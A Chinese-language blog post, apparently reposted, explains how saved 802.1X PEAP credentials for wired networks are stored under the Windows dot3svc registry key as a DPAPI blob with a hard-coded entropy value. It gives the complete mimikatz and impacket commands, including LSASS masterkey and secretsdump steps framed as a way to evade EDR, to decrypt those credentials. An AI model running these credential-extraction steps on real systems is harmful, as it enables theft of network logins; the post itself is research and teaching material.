从网络配置文件中提取PEAP凭据

我的一位同事最近遇到了这样一种情况:他可以物理访问使用802.1X连接到有线网络的Windows计算机,同时保存了用于身份验证的用户凭据,随后他想提取这些凭据,您可能认为这没什么特别的,但是事情却有点崎岖波折……

如何开始

对于这篇博文我将假设读者已经熟悉基本的Windows凭据提取技术和802.1X网络身份验证概念,因为我想就一次简短地写一下。如果您搜索如何在Windows上提取受保护的可扩展身份验证协议(PEAP)凭据,您将找到大量有关无线网络的结果,但没有任何有关有线网络的结果。因为当谈到有线网络上的网络访问控制(NAC)时,常见的实现依赖于基于证书的身份验证(例如:EAP-TLS)或第三方软件和设备。
我们可以了解到有关无线网络PEAP的一件事是其凭证使用数据保护API(DPAPI)加密保存,这是一条非常基本的信息,但至少我们知道会发生什么,那么我们如何在有线接口上设置802.1X PEAP身份验证呢?这很简单,我们打开"Windows设置"应用程序,单击"网络和 Internet",转到"Internet"部分,单击链接"更改适配器选项",然后我们就会看到旧版控制面板的"网络连接"视图

从那里我们可以选择一个以太网接口,右键单击它以打开上下文菜单,单击"属性"并转到"身份验证"选项卡...

有时候我们可能会发现没有"身份验证"选项卡,这种情况下我们就需要启动"有线自动配置"服务,也就是dot3svc,完成后"身份验证"选项卡在属性中可见

最后我们可以点击"高级设置",勾选"指定身份验证模式",在下拉列表中选择"用户身份验证",点击"保存凭据"后输入我们的凭据

为了这篇博文的目的,这里我们选择了容易识别的值:ThisIsMyUsername和ThisIsMyPassword,设置现已准备就绪,现在我们可以开始尝试提取凭据了

凭据存储

假设凭证存储在文件系统或注册表的某个位置,那么我们的想法就是使用Process Monitor来查找诸如CreateFile、WriteFile或之类的操作RegSetValue

可以看到在几秒钟之内就捕获了数千个事件,耐心地浏览这些事件时我注意到一个非常有趣的事件链,lsass.exe进程打开了帐户Preferred的文件LocalSystem,这暗示使用了DPAPI,然后是RegSetValue另一个服务(svchost.exe进程)的操作

RPC过程s_SSCryptProtectData是与客户端API相对应的服务器端函数CryptProtectData,同时因为访问的是账户Preferred的文件LocalSystem,所以我们知道使用了哪个主密钥
下面的截图显示了有关该操作的一些细节,二进制blob被写入注册表项中的RegSetValue名称为的值,此操作源自服务,我们之前必须启动该服务才能首先配置PEAP,WiredHKLM\SOFTWARE\Microsoft\dot3svc\Interfaces{215B523B-D0D3-42AB-BF7E-C143108E2422}\UserData\Profiles{9A2E6B93-5356-49B7-A0E1-67B8CE8AEBBE}dot3svc

二进制数据以01 00 00 00 D0 8C ...开头,它看起来绝对像一个DPAPI blob

解密操作

快速查看注册表可以确认一个新的"用户数据配置文件"以具有随机GUID的注册表项的形式附加到我们的网络接口并且一个名为的二进制值Wired已添加到此配置文件中

我们可以使用PowerShell中的以下命令提取原始数据并将其保存到文件中

$RegPath = "HKLM\SOFTWARE\Microsoft\dot3svc\Interfaces\{215B523B-D0D3-42AB-BF7E-C143108E2422}\UserData\Profiles\{9A2E6B93-5356-49B7-A0E1-67B8CE8AEBBE}"
$Blob = Get-ItemPropertyValue -Path "Registry::$RegPath" -Name "Wired"
[IO.File]::WriteAllBytes("C:\Temp\wired.bin", $Blob)

通过将输出文件输入到mimikatz中,我们可以确认数据确实是DPAPI blob,该工具还显示关联主密钥的ID 48c77ef6-4aa9-4da5-b850-b545e4b86de6:

dpapi::blob /in:c:\temp\wired.bin /raw

当然我们也可以通过读取文件内容来获取此信息Preferred,因为它包含当前正在使用的主密钥的GUID,但在实际情况下它可能是一个较旧的密钥,因此从blob本身获取此信息仍然更可靠

获取主密钥值的一种方法是使用mimikatz命令sekurlsa::dpapi,请注意它需要具有LSASS进程的访问权限(例如:具有调试权限)

要获取明文数据,我们只需将命令行参数/unprotect和添加/masterkey:KEY到上一个dpapi::blob命令中

dpapi::blob /in:c:\temp\wired.bin /raw /unprotect /masterkey:73b724580d0abfd9ebb62c462151334ced52fb75203dace1f8ab631326b75c3a297246e577362dfba88bb3ae5561fa091e1d9b02c450d859a19fed66e397d9f5

我们得到错误代码0x80090005,即NTE_BAD_DATA,当"要解密的数据无效"或"发现填充无效CryptDecrypt"时会返回此错误,此时我尝试摆弄输入数据还使用十六进制编辑器仔细检查了blob数据并验证了主密钥,但我无法弄清楚解密出了什么问题

回退分析

我非常确定自己对输入数据(即数据blob和主密钥)无能为力,因此我得出结论——解密过程中还涉及其他内容,我退后一步仔细查看导致该操作的事件,RegSetValue看看是否遗漏了什么

根据此调用堆栈,RpcSetProfileEapUserData将调用RPC过程,这将导致调用内部函数StSaveUserData并使用API将 DPAPI blob写入注册表RegSetValueExW,正如我们之前所见,通过快速查看dot3svc.dllGhidra很容易重建该StSaveUserData函数源代码的以下部分

// ...
status = RegCreateKeyExW(hKey, lpSubKey, 0, NULL, 0, KEY_WRITE, NULL, &hNewKey, NULL);
if (status == 0) {bSuccess = CryptProtectData(&DataIn,    // pointer to DATA_BLOB: encrypted dataNULL,       // optional description&blobSalt,  // pointer to DATA_BLOB: optional entropyNULL,       // reservedNULL,       // optionalCRYPTPROTECT_UI_FORBIDDEN, // flags&DataOut    // pointer to DATA_BLOB: decrypted data);if (bSuccess) {status = RegSetValueExW(hNewKey, lpValueName, 0, REG_BINARY, DataOut.pbData, DataOut.cbData);}
}
// ...

有趣的部分就在这里,第三个(可选)参数用于传递对名为blobSalt的全局变量的引用,请注意我没有给这个变量命名,该名称blobSalt是在链接到的公共符号文件中提供的dot3svc.dll
根据文档CryptProtectData,此参数是"指向DATA_BLOB结构的指针,该结构包含用于加密数据的密码或其他附加熵",此外"加密阶段使用的结构也必须在解密阶段使用",结构DATA_BLOB定义如下,它包含指向缓冲区的指针以及缓冲区的大小

typedef struct _CRYPTOAPI_BLOB {DWORD cbData;BYTE  *pbData;
} CRYPT_INTEGER_BLOB, /* ... */, DATA_BLOB, /* ... */ *PCRYPT_ATTR_BLOB;

在我的DLL版本(10.0.19041.3636))中全局变量blobSalt位于0x1800400c0可写部分中的地址.data,数据类型最初_CRYPTOAPI_BLOB由Ghidra的PDB分析器设置,但此结构未定义,因此我将数据类型设置为DATA_BLOB

我原本以为结构会全为零并在服务初始化期间填充,但我发现缓冲区地址设置为0x1800377e0,位于只读.rdata部分内,换句话说看起来熵/盐值只是硬编码的

最后我们的凭证只是使用帐户的主密钥LocalSystem和盐进行加密,幸运的是mimikatz有一个命令参数,我们可以通过它传递这个可选值

dpapi::blob /in:c:\temp\wired.bin /raw /unprotect /masterkey:73b724580d0abfd9ebb62c462151334ced52fb75203dace1f8ab631326b75c3a297246e577362dfba88bb3ae5561fa091e1d9b02c450d859a19fed66e397d9f5 /entropy:6eafe55eabc3495c9808c61ee123342f /out:c:\temp\wired_decrypted.bin

这次解密成功了,我们可以读取输出文件来获取我们的明文凭证

现在您可能想知道此值是否在所有版本的DLL中都相同,我不能肯定地说,但我检查了其中几个结果是相同的,所以很可能是这样

隐秘方法

Mimikatz是一款很棒的工具,但让它在目标机器上运行起来可能很麻烦,尤其是在当今,有那么多EDR/XDR保护措施,我自己有一些打包程序可以完成这项工作,但我们最好不要直接在目标上运行任何东西,为此我设计了一个仅使用impacket脚本离线解密数据的程序
首先我们可以重用初始的PowerShell命令将DPAPI blob转储到文件中

$RegPath = "HKLM\SOFTWARE\Microsoft\dot3svc\Interfaces\{215B523B-D0D3-42AB-BF7E-C143108E2422}\UserData\Profiles\{9A2E6B93-5356-49B7-A0E1-67B8CE8AEBBE}"
$Blob = Get-ItemPropertyValue -Path "Registry::$RegPath" -Name "Wired"
[IO.File]::WriteAllBytes("C:\Temp\wired.bin", $Blob)

如果我们可以通过网络访问目标,我们可以使用以下命令递归查询注册表并转储我们感兴趣的值

# 1. Get the network interface and profile IDs
export KEY_BASE="HKLM\SOFTWARE\\Microsoft\\dot3svc\\Interfaces"
impacket-reg 'USER:PASS@TARGET' query -keyName "${KEY_BASE}" -s# 2. Get the content of the 'Wired' value
export INTERFACE_GUID="{INTERFACE_GUID_HERE}" # {215B523B-D0D3-42AB-BF7E-C143108E2422}
export PROFILE_GUID="{PROFILE_GUID_HERE}"     # {9A2E6B93-5356-49B7-A0E1-67B8CE8AEBBE}
impacket-reg 'USER:PASS@TARGET' query -keyName "${KEY_BASE}\\${INTERFACE_GUID}\\UserData\\Profiles\\${PROFILE_GUID}" -v "Wired"

假设我们有一个名为wired.bin包含DPAPI blob的文件,我们可以将其输入到dpapi.py脚本中以获取主密钥的ID

impacket-dpapi unprotect -file "wired.bin"

有了这些信息,我们就知道需要从目标机器检索哪个主密钥文件

cp "C:\windows\System32\Microsoft\Protect\S-1-5-18\User\48C77EF6-4AA9-4DA5-B850-B545E4B86DE6" "c:\temp"
attrib.exe /s /h /r /d "C:\temp\48C77EF6-4AA9-4DA5-B850-B545E4B86DE6"

主密钥受帐户的DPAPI用户密钥保护,如果您有和配置单元LocalSystem的副本,则可以按如下方式提取它,您也可以使用它来远程转储它——SYSTEMSECURITYsecretsdump.py

# Locally
impacket-secretsdump -system "system.bin" -security "security.bin" LOCAL# Remotely
impacket-secretsdump 'USER:PASS@TARGET'

有了DPAPI用户密钥,我们就可以解密主密钥文件从而提取保护我们的DPAPI blob的密钥

impacket-dpapi masterkey -file "48C77EF6-4AA9-4DA5-B850-B545E4B86DE6" -key "0xc99eb525bc17b9da543b4851290dff4066502f39"

最后我们可以提供DPAPI blob、加密密钥和熵文件来dpapi.py解密DPAPI blob并提取保存的凭据

echo "6eafe55eabc3495c9808c61ee123342f" | xxd -r -p > entropy.bin
impacket-dpapi unprotect -file "wired.bin" -key "0x73b724580d0abfd9ebb62c462151334ced52fb75203dace1f8ab631326b75c3a297246e577362dfba88bb3ae5561fa091e1d9b02c450d859a19fed66e397d9f5" -entropy-file "entropy.bin"

文末小结

这是一次有趣的探索旅程,最重要的是这是一个探索DPAPI的好机会,希望这篇文章能帮助任何遇到类似情况的人

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/353785.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

屏蔽房是做什么用的?为什么需要定期检测?

屏蔽房是做什么用的?为什么需要定期检测?

屏蔽房对于不了解的人来说,可能光看名字不知道是做什么的,但是对于一些企业或者机构,却是再熟悉不过的了。和名字一样,屏蔽房是对空间内的信号以及一些外界环境条件进行隔绝,在一些有特殊要求的企业机构中,…
阅读更多...
人生的乐趣,在于对真知的追求

人生的乐趣,在于对真知的追求

子曰:朝闻道,夕死可矣! 孔子说:早上听到关于世界的真理,哪怕晚上就die了都可以。 这句话很有力量而经常被人引用,表达出我们如何看待沉重的肉身和精神世界。 我们的生活目的:道。 —— 要了解…
阅读更多...
陶建辉入选 2023 年度“中国物联网行业卓越人物榜”

陶建辉入选 2023 年度“中国物联网行业卓越人物榜”

在这个技术飞速发展的时代,物联网行业作为推动社会进步的重要力量,正在不断地演化和革新。近日,中国智联网生态大会暨“2023 物联之星”年度榜单颁奖典礼在上海浦东举行。现场公布了拥有物联网行业奥斯卡奖之称的 ——“物联之星 2023 中国物…
阅读更多...
鸿蒙 Text文本过长超出Row的范围问题

鸿蒙 Text文本过长超出Row的范围问题

代码如下: 可以发现随着文本内容的增加, 第二个组件test2明显被挤出了屏幕外, 感觉像是Row自己对内容的约束没做好一样, 目前没看到官方的推荐解决方法, 机缘巧合下找到了个这种的办法, 给内容会增加的组件设置layoutWeight(), 借助layoutWeight的特性来解决该问题, 改动后代码…
阅读更多...
探究 IP 地址被网站封禁的原因

探究 IP 地址被网站封禁的原因

在我们登录各种网站、APP浏览时,可能会遇到 IP 地址被某些网站封禁的情况。很多人奇怪这是为什么呢? 首先,违反网站的使用规则是比较常见的原因之一。比如,频繁发送垃圾邮件、恶意评论、进行网络攻击或试图破解网站的安全机制等不…
阅读更多...
餐饮点餐系统小程序(ThinkPHP+FastAdmin+UniApp)

餐饮点餐系统小程序(ThinkPHP+FastAdmin+UniApp)

便捷美食新体验🍔📱 基于ThinkPHPFastAdminUniApp开发的餐饮点餐系统,主要应用于餐饮,例如早餐、面馆、快餐、零食小吃等快捷扫码点餐需求,标准版本仅支持先付款后就餐模式,高级版本支持先付后就餐和先就餐…
阅读更多...
【Docker系列】深入解析 Docker 容器部署脚本

【Docker系列】深入解析 Docker 容器部署脚本

💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…
阅读更多...
git的分支管理

git的分支管理

✨前言✨ 📘 博客主页:to Keep博客主页 🙆欢迎关注,👍点赞,📝留言评论 ⏳首发时间:20246月19日 📨 博主码云地址:博主码云地址 📕参考书籍&#x…
阅读更多...
003.Linux SSH协议工具

003.Linux SSH协议工具

我 的 个 人 主 页:👉👉 失心疯的个人主页 👈👈 入 门 教 程 推 荐 :👉👉 Python零基础入门教程合集 👈👈 虚 拟 环 境 搭 建 :👉&…
阅读更多...
【Linux 基础】目录结构

【Linux 基础】目录结构

Linux 的目录结构(也称为文件系统结构)是组织文件和目录的一种逻辑方式。每个文件和目录在文件系统中都有一个唯一的位置或路径。 Linux文件系统是整个操作系统的基础架构,对于系统的稳定运行、数据安全以及用户操作便捷性至关重要&#xff0…
阅读更多...
k8s快速上手实操

k8s快速上手实操

前言 Kubernetes(简称K8s)是由Google开源的一个用于自动化部署、扩展和管理容器化应用程序的系统。自2014年发布以来,Kubernetes已经迅速成长为容器编排领域的标准,并在全球范围内得到了广泛的采用和认可。 Kubernetes作为现代容…
阅读更多...
全新量子计算技术!在硅中可以生成大规模量子比特

全新量子计算技术!在硅中可以生成大规模量子比特

内容来源:量子前哨(ID:Qforepost) 文丨沛贤/浪味仙 排版丨沛贤 深度好文:1600字丨6分钟阅读 摘要:研究人员利用气体环境在硅中形成被称为“色心”的可编程缺陷,首次利用飞秒激光,…
阅读更多...
有关排序的算法

有关排序的算法

目录 选择法排序 冒泡法排序 qsort排序(快速排序) qsort排序整型 qsort排序结构体类型 排序是我们日常生活中比较常见的问题,这里我们来说叨几个排序的算法。 比如有一个一维数组 arr[8] {2,5,3,1,7,6,4,8},我们想要把它排成升序&#…
阅读更多...
力扣1901.寻找峰值II

力扣1901.寻找峰值II

力扣1901.寻找峰值II 二分每一行 并用函数找出每一行中最大值的下标若最大值比其下面相邻的元素大 则上方一定存在峰值若最大值比其下面相邻的元素小 则下方一定存在峰值 class Solution {int indexmax(vector<int> &a){return max_element(a.begin(),a.end()) - …
阅读更多...
FPGA早鸟课程第二弹 | Vivado 设计静态时序分析和实际约束

FPGA早鸟课程第二弹 | Vivado 设计静态时序分析和实际约束

在FPGA设计领域&#xff0c;时序约束和静态时序分析是提升系统性能和稳定性的关键。社区推出的「Vivado 设计静态时序分析和实际约束」课程&#xff0c;旨在帮助工程师们掌握先进的设计技术&#xff0c;优化设计流程&#xff0c;提高开发效率。 课程介绍 关于课程 权威认证&…
阅读更多...
Spire.PDF for .NET【文档操作】演示:如何删除 PDF 中的图层

Spire.PDF for .NET【文档操作】演示:如何删除 PDF 中的图层

借助Spire.PDF&#xff0c;我们可以在新建或现有pdf文档的任意页面中添加线条、图像、字符串、椭圆、矩形、饼图等多种图层。同时&#xff0c;它还支持我们从pdf文档中删除特定图层。 Spire.PDF for .NET 是一款独立 PDF 控件&#xff0c;用于 .NET 程序中创建、编辑和操作 PD…
阅读更多...
Redis协议规范简介

Redis协议规范简介

Redis客户端使用为名为RESP&#xff08;Redis序列化协议&#xff09;的协议与Redis服务器进行通信。虽然该协议是专门为Redis设计的&#xff0c;但它也可以用于其他的CS软件项目的通信协议。 RESP可以序列化不同的数据类型&#xff0c;如整型&#xff0c;字符串&#xff0c;数…
阅读更多...
wsl报错在BIOS中启用虚拟化

wsl报错在BIOS中启用虚拟化

解决&#xff1a; Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All 以高级管理员身份运行powershell&#xff0c;执行如上命令。
阅读更多...
在哪可以查到全网的司法诉讼信息?

在哪可以查到全网的司法诉讼信息?

司法涉诉信息指的是再司法活动中形成的各种记录和资料&#xff0c;涵盖了诉讼案件的立案&#xff0c;审判&#xff0c;执行等各个环节的记录和文件。比如基本案件信息&#xff0c;开庭信息&#xff0c;审判信息&#xff0c;执行信息等。有时候还会涉及到被执行人&#xff0c;司…
阅读更多...
4大利好因素释放顺风车市场潜力,嘀嗒出行即将登陆港交所

4大利好因素释放顺风车市场潜力,嘀嗒出行即将登陆港交所

经历了十多年发展&#xff0c;共享出行行业即将迎来第一个上市公司——专注顺风车和智慧出租车的嘀嗒出行。 近日&#xff0c;嘀嗒出行通过了港交所聆讯&#xff0c;根据招股书&#xff0c;嘀嗒出行2023年顺风车搭乘次数和交易额分别为约1.3亿次和86亿元&#xff0c;同比分别增…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023